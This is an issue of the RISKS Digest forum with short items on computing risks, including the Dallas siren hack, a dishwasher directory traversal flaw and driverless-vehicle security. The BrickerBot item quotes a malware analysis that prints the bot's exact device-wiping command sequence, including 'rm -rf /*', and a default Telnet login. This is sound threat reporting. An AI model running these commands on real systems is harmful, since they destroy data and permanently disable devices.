The Risks Digest

The RISKS Digest

Forum on Risks to the Public in Computers and Related Systems

ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator

Volume 30 Issue 24

Saturday 15 April 2017

Contents

Someone hacked every tornado siren in Dallas. It was loud.
Avi Selk
Brexit vote site may have been hacked, MPs say in report
BBC
Prison inmates built working PCs out of e-waste, networked them, and hid them in a closet ceiling
BoingBoing
Is Your Fingerprint-Locked Cell Phone Really Secure?
Patch
FBI Arrests Hacker Who Hacked No One
The Daily Beast
"Dishwasher has directory traversal bug"
The Register
"BrickerBot" disables vulnerable IoT devices
Radware
Securing driverless taxis is going to be really really hard
BoingBoing
Uber's 'Hell' program tracked and targeted Lyft drivers
Engadget
Autonomous Electric Vehicle impact on Economy
Evans & Shedlock
Google's Sheriffbot: presto, no more bugs!
Dan Jacobson
IPv6 attacks bypass network intrusion-detection systems
IT News
How Scammers Were Able to Game Google Maps
Fortune via Gabe Goldberg
Security firms sometimes wreck FBI investigations. Here's how.
CyberScoop
Anova Ticks Off Customers By Requiring Accounts To Cook Food Using The App
Consumerist
Interesting interview with Ed Felten on his FTC and WH experience
PGN
Re: Follow the Money
Peter Houppermans
Re: How Garadget Avenged a One-Star Review With Digital Sabotage
Amos Shapir
Re: The future of the open Internet
Chris Drewe
Info on RISKS (comp.risks)

Someone hacked every tornado siren in Dallas. It was loud. (Avi Selk)

Dewayne Hendricks <dewayne@warpspeed.com>
Sun, Apr 9, 2017 at 3:03 PM
*The Washington Post*, 9 Apr 2017
<https://www.washingtonpost.com/news/the-intersect/wp/2017/04/09/someone-hacked-every-tornado-siren-in-dallas-it-was-loud/>

Dallas residents got an unexpected wake up call on 8 Apr when all the city's
156 emergency sirens were set off just before midnight.  Officials says a
hacker was to blame. (Reuters)

Last year, someone kept hacking into traffic signs in Dallas—corrupting
bland electronic messages into jokey missives such as: “Work is Canceled,
Go Back Home'', and `Donald Trump Is A Shapeshifting Lizard'.

Funny? Dumb? Vandalism? Whatever your opinion of the pranks, the big Dallas
hack of 2016 had one quality totally lacking in this year's sequel: It was
silent.


Brexit vote site may have been hacked, MPs say in report (BBC)

"Peter G. Neumann" <neumann@csl.sri.com>
Wed, 12 Apr 2017 12:54:14 PDT
A voter registration site that crashed in the run-up to last year's EU
referendum could have been targeted by a foreign cyber attack, MPs say.

The "register to vote" site <https://www.gov.uk/register-to-vote> crashed
on 7 June last year just before the deadline for people to sign up to vote.

The UK government and electoral administrators blamed a surge in demand
after a TV debate.

But MPs on the parliamentary Public Administration Committee say a foreign
cyber attack could not be ruled out.

http://www.bbc.com/news/uk-politics-39564289


Prison inmates built working PCs out of e-waste, networked them, and hid them in a closet ceiling

Gabe Goldberg <gabe@gabegold.com>
Thu, 13 Apr 2017 23:32:48 -0400
Inmates in Ohio's Marion Correctional Institution smuggled computer parts
out of an e-waste recycling workshop and built two working computers out of
them, hiding them in the ceiling of a training room closet ceiling and
covertly patching them into the prison's network.

The prisoners used the PCs for a number of activities, including several
criminal acts like identity theft and credit-card fraud. They were able to
network their PC by using a guard's password; the use of this account on
days when the guard wasn't on-shift tipped off the prison's systems
administrators that something was awry.

http://boingboing.net/2017/04/12/mother-necessity-where-would-w.html


Is Your Fingerprint-Locked Cell Phone Really Secure? (Patch)

Gabe Goldberg <gabe@gabegold.com>
Tue, 11 Apr 2017 14:32:36 -0400
https://patch.com/virginia/annandale/s/g38gc/is-your-fingerprint-locked-cell-phone-really-secure

Some devices—my iPad, for example—require entering passcode after a
very few failed fingerprint attempts. So trying random "masterprints" to
unlock may not be practical or terribly successful.


FBI Arrests Hacker Who Hacked No One (The Daily Beast)

Gabe Goldberg <gabe@gabegold.com>
Wed, 12 Apr 2017 09:55:30 -0400
He built a piece of software.  That tool was pirated and abused by
hackers. Now the feds want him to pay for the computer crooks' crimes.

http://www.thedailybeast.com/articles/2017/03/31/fbi-arrests-hacker-who-hacked-no-one.html


"Dishwasher has directory traversal bug" (The Register)

Gene Wirchenko <genew@telus.net>
Thu, 06 Apr 2017 12:03:38 -0700
https://www.theregister.co.uk/2017/03/26/miele_joins_internetofst_hall_of_shame/
Thanks a Miele-on for making everything dangerous,
Internet of Things firmware slackers
Richard Chirgwin, *The Register*, 26 Mar 2017

selected text:

Don't say you weren't warned: Miele went full Internet-of-Things with a
network-connected dishwasher, gave it a web server, and now finds itself on
the wrong end of a security bug report—and it's accused of ignoring the
warning.

The utterly predictable vulnerability advisory on the Full Disclosure
mailing list details CVE-2017-7240—aka Miele Professional PG 8528—Web
Server Directory Traversal.  This is the built-in web server that's used to
remotely control the glassware-cleaning machine from a browser.

And because Miele is an appliance company and not a pure-play IT company, it
doesn't have a process for reporting or fixing security bugs. The researcher
who noticed the dishwasher's web server vulnerability—Jens Regel of
German company Schneider-Wulf—complains that Miele never responded when
he contacted the biz with his findings; he says his first contact was made
in November 2016.


"BrickerBot" disables vulnerable IoT devices (Radware)

Henry Baker <hbaker1@pipeline.com>
Sat, 08 Apr 2017 17:53:14 -0700
FYI—Southern California is an area prone to wildfires, which have
routinely destroyed many homes in the past.  As a result, there are *fire
regulations* that force home-owners to clean up vegetation which can burn
and put homes at risk.  Fire departments also engage in "controlled burns",
which more-or-less-safely burn up some of the brush that can sustain a
wildfire.  And when fighting a wildfire, fire departments often have to set
"backfires", which burn the brush ahead of the wildfire to remove the fuel
that would enable the main fire to spread.

Apparently, some vigilante has decided to light a *controlled
burn*/*backfire* in order to clear out the brush (vulnerable IoT devices)
that would sustain a much larger & more damaging wildfire (major
infrastructure breach and/or denial-of-service).

A biological analogy for "BrickerBot" might be IoT "apoptosis".

https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/
https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1417

"BrickerBot" Results In Permanent Denial-of-Service, 5 Apr 2017

Abstract

Imagine a fast moving bot attack designed to render the victim's hardware
from functioning.  Called Permanent Denial-of-Service (PDoS), this form of
cyber-attack is becoming increasingly popular in 2017 as more incidents
involving this hardware-damaging assault occur.

Also known loosely as "phlashing" in some circles, PDoS is an attack that
damages a system so badly that it requires replacement or re-installation of
hardware.  By exploiting security flaws or misconfigurations, PDoS can
destroy the firmware and/or basic functions of system.  It is a contrast to
its well-known cousin, the DDoS attack, which overloads systems with
requests meant to saturate resources through unintended usage.

BrickerBot—Discovery and Analysis of a PDoS Tool

Over a four-day period, Radware's honeypot recorded 1,895 PDoS attempts
performed from several locations around the world.  Its sole purpose was to
compromise IoT devices and corrupt their storage.  Besides this intense,
short-lived bot (BrickerBot.1), Radware's honeypot recorded attempts from a
second, very similar bot (BrickerBot.2) which started PDoS attempts on the
same date—both bots were discovered less than one hour apart—with
lower intensity but more thorough and its location(s) concealed by TOR
egress nodes.

Compromising a Device

The Bricker Bot PDoS attack used Telnet brute force - the same exploit
vector used by Mirai - to breach a victim's devices.  Bricker does not try
to download a binary, so Radware does not have a complete list of
credentials that were used for the brute force attempt, but were able to
record that the first attempted username/password pair was consistently
'root'/'vizxv'.

Corrupting a Device

Upon successful access to the device, the PDoS bot performed a series of
Linux commands that would ultimately lead to corrupted storage, followed by
commands to disrupt Internet connectivity, device performance, and the
wiping of all files on the device.  Below is the exact sequence of commands
that performed by the PDoS bots:

fdisk -l
busybox cat /dev/urandom >/dev/mtdblock0 &
busybox cat /dev/urandom >/dev/sda &
busybox cat /dev/urandom >/dev/mtdblock10 &
busybox cat /dev/urandom >/dev/mmc0 &
busybox cat /dev/urandom >/dev/sdb &
busybox cat /dev/urandom >/dev/ram0 &
fdisk -C 1 -H 1 -S 1 /dev/mtd0
w
fdisk -C 1 -H 1 -S 1 /dev/mtd1
w
fdisk -C 1 -H 1 -S 1 /dev/sda
w
fdisk -C 1 -H 1 -S 1 /dev/mtdblock0
w
route del default;iproute del default;ip route del default;rm -rf /* 2>/dev/null &
sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1
halt -n -f
reboot

Among the special devices targeted are /dev/mtd (Memory Technology Device -
a special device type to match flash characteristics) and /dev/mmc
(MultiMediaCard - a special device type that matches memory card standard, a
solid-state storage medium).

The sysctl commands attempt to reconfigure kernel parameters:
net.ipv4.tcp_timestamps=0 disables TCP timestamps which does not affect
local LAN IPv4 connectivity but seriously impacts the Internet
communication, and kernel.threads-max=1 limits the max number of kernel
threads to one.  Typically, this is in the 10,000s for ARM-based devices.

Targets

The use of the 'busybox' command combined with the MTD and MMC special
devices means this attack is targeted specifically at Linux/BusyBox-based
IoT devices which have their Telnet port open and exposed publicly on the
Internet.  These are matching the devices targeted by Mirai or related IoT
botnets.

The PDoS attempts originated from a limited number of IP addresses spread
around the world.  All devices are exposing port 22 (SSH) and running an
older version of the Dropbear SSH server.  Most of the devices were
identified by Shodan as Ubiquiti network devices; among them are Access
Points and Bridges with beam directivity. ...


Securing driverless taxis is going to be really really hard (BoingBoing)

Lauren Weinstein <lauren@vortex.com>
Wed, 12 Apr 2017 08:20:23 -0700
NNSquad
http://boingboing.net/2017/04/12/uber-for-carjacking.html

  Charlie Miller made headlines in 2015 as part of the team that showed it
  was possible to remote-drive a Jeep Cherokee over the internet, triggering
  a 1.4 million vehicle recall; now, he's just quit a job at Uber where he
  was working on security for future self-driving taxis, and he's not
  optimistic about the future of this important task.


Uber's 'Hell' program tracked and targeted Lyft drivers (Engadget)

Lauren Weinstein <lauren@vortex.com>
Thu, 13 Apr 2017 07:33:46 -0700
NNSquad
https://www.engadget.com/2017/04/13/uber-hell-program-lyft-drivers/

  As for Lyft, a spokesperson told The Information: "We are in a competitive
  industry. However, if true, these allegations are very concerning." A
  couple of law firms that worked with Uber in the past also told the
  publication that the company could face a number of allegations, including
  breach of contract, unfair business practices, misappropriation of trade
  secrets and violation of the federal Computer Fraud and Abuse Act.

Are self-driving taxis just going through pUBERty?


Autonomous Electric Vehicle impact on Economy (Evans & Shedlock)

"Alister Wm Macintyre" <macwheel99@wowway.com>
Mon, 10 Apr 2017 10:26:53 -0500
https://mishtalk.com/2017/04/08/second-order-consequences-of-self-driving-vehicles/

http://ben-evans.com/benedictevans/2017/3/20/cars-and-second-order-consequences

Imagining transportation in our next generation.

[?] of global oil production is for vehicle fuels.

But if that is replaced by electric for electric cars, how do we get that
extra power—other fossil fuels, solar, hydro-electric, more nuclear power
plants?

Over 1 million people killed per year in road accidents, mostly human error.
Those accidents also cause property damage, medical and legal costs, traffic
jams, insurance costs.  With dramatically less collisions, will we still
need such a large investment in safety features?

Millions of long-haul truck drivers, local taxi and delivery drivers, and
non-drivers supporting those industries.

Driverless trucks need robots, or cheap labor, for loading & unloading at
various destination points of the trucks.

Trucks can be driving 24 hours, instead of 11, minus time to refuel & get
maintenance.  Will we need as many trucks?  They can travel safely much
faster, except for terrorist hacker caused spectacular mass pile ups.

150,000 gas stations, most of their money made selling cigarettes and
snacks.

They can morph into battery recharge for driverless cars, while their owners
are at home asleep, or busy at day job.

Payment could be via prepaid account, or other banking arrangement.  Owner
might also have a standing request for the battery fill up place to
replenish in-car supply of snacks and cigarettes for the normal vehicle
riders.

Then when owner exits home, or day job, car is on-demand and supplied with
the usual, so riders not inconvenienced with extra stops in transit, the
autonomous vehicle to handle all that at times when normal riders not need
it.

If our autonomous vehicle is on demand, it need no longer be parked in
walking distance.  Congestion less, when cities no longer need long term
parking lanes.

If our car is parked driverless, until we send the signal to call it to pick
us up, how will that driverless car put coins in parking meter, where it is
off-street parked waiting to be called?  May it go driverless to the battery
fill up place, so it is fully ready when on-demand called?

Will bus service be only in high population areas, with robotaxi on the city
fringes?

Will robot farm vehicles see what service is needed where, without human
involvement?

Today there are grocery stores serving the disabled.  Order what's needed,
via Internet, then drive to the store, whose personnel loads it up with the
groceries, no need to get out of car.  That technology could later be
morphed to driverless car get the groceries, a robot unload them at home.

Contemporary city road sides are filled with retail marketing signs aimed at
occupants of manually driven vehicles, encouraging them to stop here for a
restaurant, shopping, whatever.  But if we are to have autonomous cars
zooming past too fast to see the signs, marketing to reach riders of the
autonomous vehicles may need a sea change of technology rethinking.  If
those vehicles are using smart roads, commercial establishments will want
marketing to the cars coming their way, offering choices aimed at
demographics of their riders.  Will we have a bill board inside our cars,
with info about the retail establishments along our coming route?  We can
select what we want, then the car will stop there, and the store workers
will deliver our purchases to our car, for all manner of products.

A gas fill up takes only 4 minutes, but with Tesla Supercharger, you'll need
to stop 16 times more often for a battery fill up.  Can solar on top of
vehicles make a difference?  Electric cars easily catch on fire.  The
technology needs improving, so a whole battery can be slid out & replaced
with one which has been charging unattended, like at home & replacement
stations for long trips. Batteries are heavy, perhaps too heavy for elderly,
and other segments of population.  Will they need a robot helper?

Think parking garages with battery recharging stations, or robot service
going from car to car, checking what's needed, with fees added at check out
time, where license plate & auto description used to match up fees due.  Can
any driverless cars there pay by credit card signal, which cannot be
detected by fraudsters not inside the garage?

When there's an accident, police not only get CCTV of vehicles involved,
before the collision, but also data about them from every vehicle close to
them in driving prior to the accident, and records from their prior
maintenance.

City redesign, more bike paths.  Autonomous vehicles can follow each other
faster with less of an air gap, so we'll need more pedestrian bridges, less
reliance on cross-walks. Supply those bridges with coin operated escalators,
supporting transit by wheel chairs and other disabled.

If when school bus fleets get equivalent modernization, they can learn from
past troubles unfixable under the old technology.

1. Please change U.S. state laws to support shoulder harnesses, designed for
child size passengers, in addition to the lap seat belts.

2. School buses can send signals ordering relevant autonomous vehicles to
halt while stop sign is hanging out.

What will auto passengers DO when autonomous vehicle driving?  We can
legalize drinking while commuting again.  The happy hour will be in the
commute home.  More in-vehicle entertainment systems.


Google's Sheriffbot: presto, no more bugs!

Dan Jacobson <jidanni@jidanni.org>
Fri, 14 Apr 2017 05:13:11 +0800
https://www.google.com/search?q=chromium+sheriffbot

Here's an example of it hard at work:

  Comment #2 on issue 12345 by sheriffbot@chromium.org:

  Issue has not been modified or commented on in the last 365 days, please
  re-open [we can't, only they can] or file a new bug if this is still an
  issue.

  For more details visit
  https://www.chromium.org/issue-tracking/autotriage
  Your friendly Sheriffbot

So what is the problem?

Well, you might say it is like a virus/worm that eats through one's bug
database, closing things.

And how is the user to be convinced that filing a new(!) bug again won't
just end up with the same result? (Same for enthusiasm for filing other bugs
too.)


IPv6 attacks bypass network intrusion-detection systems (IT News)

Lauren Weinstein <lauren@vortex.com>
Sun, 9 Apr 2017 07:57:18 -0700
NNSquad
https://www.itnews.com.au/news/ipv6-attacks-bypass-network-intrusion-detection-systems-457476

  A paper has been published by researchers at the NATO defence alliance's
  Cooperative Cyber Defence Centre of Excellence and Estonia's Tallinn
  University of Technology. It outlines how attackers can create covert data
  exfiltration channels and system remote control, using IPv6 transition
  mechanisms.


How Scammers Were Able to Game Google Maps

Gabe Goldberg <gabe@gabegold.com>
Sat, 8 Apr 2017 14:13:06 -0400
It's now easier than ever to find a plumber to fix your leaky toilet by
simply searching Google Maps for nearby journeymen. However, there's a
chance that the plumbers you may contact could be scammers who got their
bogus listings displayed on Google's online map service.

To address the troublemakers, Google said this week that it's cracking down
on fake business listings and is making it harder for crooks to game its
mapping service.

The search giant and the University of California, San Diego released a
research paper based on an analysis of over 100,000 scam listings to
discover some of the most common ways fraudsters trick people on Google
Maps.  Additionally, the research paper said that some of the scamming
methods it discovered could also "apply to other map services, such as Yelp
and Bing Maps."

http://fortune.com/2017/04/07/google-scammers-maps/


Security firms sometimes wreck FBI investigations. Here's how.

Gabe Goldberg <gabe@gabegold.com>
Sat, 8 Apr 2017 14:17:44 -0400
https://www.cyberscoop.com/security-researchers-occasionally-disrupt-fbi-investigations-heres-how/


Anova Ticks Off Customers By Requiring Accounts To Cook Food Using The App (Consumerist)

Gabe Goldberg <gabe@gabegold.com>
Fri, 14 Apr 2017 09:51:43 -0400
Being able to control devices in your kitchen via your phone is convenient,
at least that was the case for owners of the Anova Precision Cooker. But
many of those consumers say a recent update to the sous vide cooker's app
requires them to create an account and share personal information with the
company in order to use all of the features of the device.

https://consumerist.com/2017/04/12/anova-ticks-off-customers-by-requiring-mandatory-accounts-to-cook-food/

IoT food prep. What could go wrong with that?

  [Remember, I never sausage nonsense.  The wurst is yet to come.  PGN]


Interesting interview with Ed Felten on his FTC and WH experience

"Peter G. Neumann" <neumann@csl.sri.com>
Thu, 13 Apr 2017 13:41:09 PDT
http://www.princeton.edu/main/news/archive/S49/20/23S03/?section=topstories

  “Computer scientists need to develop a culture of government service, I
  think it should be evident right now that it is not the best thing for our
  field, or for society, to sit back.''

Felten said society is facing significant, rapid changes from developments
ranging from self-driving cars to artificial intelligence.  If society is
going to adapt to these developments and avoid disruption, technical experts
must play a central role.

  “If our community of scientists and engineers doesn't show up and
  participate in the process, the decisions are still going to get made but
  they will get made without the full input they need, It is very important
  to show up.''


Re: Follow the Money (Weinstein, RISKS-30.23)

Peter Houppermans <ph@houppermans.net>
Fri, 7 Apr 2017 09:08:12 +0200
  "I am convinced that the massive rise in Internet hate speech --
  including on YouTube in continuing conflict with Google's own terms of
  service—has been largely driven by ad network-based monetization
  systems."

I wonder how much "social" media's enthusiasm for eradicating fake news and
hate speech will increase if they realise this has created yet another
argument for ad blocking.

This is yet again a case of neglect creating consequences: in their quest
for volume, they did not screen for malware, which is now the main driver
for people to block advertising (more so than to protect their privacy).
Not checking content has created a high volume of fake news, ironically
called into life by giving it its own, new name rather than calling it what
it is: lies.

I've seen quite a few of these accounts under credible names, the giveaway
is usually the fact that they're recent (late 2016 or 2017), of course their
content and often using a computer generated voice in the material, which
suggests that those creating the material either do not speak English or
with a sufficiently strong accent to give the game away.  Using computer
speech prevents that - all they need is a script.  It is all rather too
intelligent for it to be done by casual operators.

Unfortunately, this neglect is not victimless: sites that depend on ad
revenue suffer as a consequence because they don't have the resources to
build up their own client base - what I find interesting is that big news
setups don't seem to be able to go it alone either and host their own ads.
If I were a business dependent on ads I'd try to find an outlet with a
sufficiently discerning policy that ensured sensible placement - a quest
that may just spur the advertising agencies into creating their own network
after all.

They too are finally discovering that "free" carries a hefty price..


Re: How Garadget Avenged a One-Star Review With Digital Sabotage (RISKS-30.23)

Amos Shapir <amos083@gmail.com>
Sun, 9 Apr 2017 19:18:29 +0300
This operator's attitude problem just serves to demonstrate the real
problem with this device (and many other IOT devices): The gadget requires
a continuous and permanent Internet connection to the operator's site.

This opens up a Pandora box of possible problems, each one of which can
render the device useless (at best).  I wouldn't touch anything like that
with a ten-foot pole (or any other means of connection).


Re: The future of the open Internet (RISKS-30.23)

Chris Drewe <e767pmk@yahoo.co.uk>
Thu, 13 Apr 2017 22:22:27 +0100
In Europe, there are mutterings about making ISPs, search engines, social
networking sites, etc. legally responsible for whatever they handle
(i.e., making them publishers instead of transmission systems), which may
well have the same result but for a very different reason.  Right now,
internet/computer companies are accused of promoting terrorism by allowing
extremists to communicate freely and (gasp!) secretly, thus allowing them to
broadcast propaganda and plot their acts of violence, while at the same time
people can send and receive objectionable 'adult' material, Fake News,
financial scams and other swindles, and the problem of illegal file-sharing
of copyrighted material has never gone away.  (And the companies make money
from this, as if it was somehow OK if they were government departments or
not-for-profit organisations.)

While I'm no expert, it looks like there's the obvious problem of the huge
resources needed to vet the vast amount of information available, which
would in turn require funding not likely to be available with current
business models.  In the case of social networking sites, much of their
appeal (so they tell me) is the spontaneity of being able to post a message
visible around the world in seconds, which would be lost if posts had to be
submitted to an editorial panel for consideration, after payment of a fee...

Of course the USA tends to have a more-robust approach to freedom of speech
than Europe so there's the additional problem of material that's acceptable
in one part of the world but not elsewhere, hence the possibility of
separate walled gardens in different territories.

Getting back to the original post:

> So far, the story of the Internet has followed the same tragic narrative
> that's befallen other information technologies over the past 160 years:
>
>   * Inventors discovered the technology.
>   * Hobbyists pioneered the applications of that technology, and
>     popularized it.
>   * Corporations took notice. They commercialized the technology,
>     refined it, and scaled it.
>   * Once the corporations were powerful enough, they tricked the government
>     into helping them lock the technology down. They installed themselves
>     as natural monopolies.

Having worked in telecomms, I can't see that, say, the telephone could have
developed into a worldwide mass speech communications system without the
resources of large companies or governments to invest in the expensive
hardware required, and standards are needed so that individual countries'
and companies' systems can interconnect.

Please report problems with the web pages to the maintainer